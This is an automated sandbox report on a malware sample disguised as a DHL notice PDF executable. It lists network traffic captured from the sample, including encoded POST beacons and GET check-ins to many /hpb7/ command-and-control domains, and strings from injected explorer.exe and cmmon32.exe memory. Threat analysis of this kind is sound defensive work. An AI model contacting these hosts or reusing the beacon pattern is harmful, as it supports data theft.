          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 21 Mar 2023 07:08:36 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 21 Mar 2023 07:08:38 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:08:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000002.517404436.000000001584A000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.0000000004EEA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/ds
          Source: DHL_Notice_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.517404436.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.00000000056C4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0dhy.xyz
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0dhy.xyz/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.club
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.club/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.clubReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/j
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfdReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/hpb7/:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com/hpb7/Xz.
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com/hpb7/:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.513596661.000000000B74D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.com
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.com/hpb7/
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ru
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ru/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ruReferer:
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org/hpb7/I
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.com
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.comReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyz
          Source: explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyz/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyzReferer:
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.com/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com/hpb7/
          Source: 146E771M.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 146E771M.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
          Source: unknownDNS traffic detected: queries for: www.yongleproducts.com
          Source: C:\Windows\explorer.exeCode function: 4_2_0B73A4E2 getaddrinfo,SleepEx,setsockopt,recv,recv,
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
